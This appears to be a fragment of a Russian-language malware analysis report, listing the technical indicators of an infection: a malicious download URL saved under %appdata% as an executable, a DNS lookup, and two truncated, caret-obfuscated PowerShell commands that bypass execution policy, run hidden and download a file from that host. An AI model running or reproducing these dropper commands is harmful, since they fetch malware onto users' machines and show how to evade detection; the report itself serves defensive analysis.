Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Powe^rSH^eLL.eXe ^-^EXECUtIO^N^PO^l^Icy ^bYPA^sS -n^OPrO^fI^le -^WiNDOWS^Ty^lE h^IdDen (NE^w-^o^BJ^ec^T^ ^System.Net.^W^EB^C^l^iENT^)^.d^ownlOAd^FilE(^'http://flowers-my.wan...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "Powe^rSH^eLL.eXe ^-^EXECUtIO^N^PO^l^Icy ^bYPA^sS -n^OPrO^fI^le -^WiNDOWS^Ty^lE h^IdDen (NE^w-^o^BJ^ec^T^ ^System.Net.^W^EB^C^l^iENT^)^.d^ownlOAd^FilE(^'http://flowers-my.wan...' (со скрытым окном)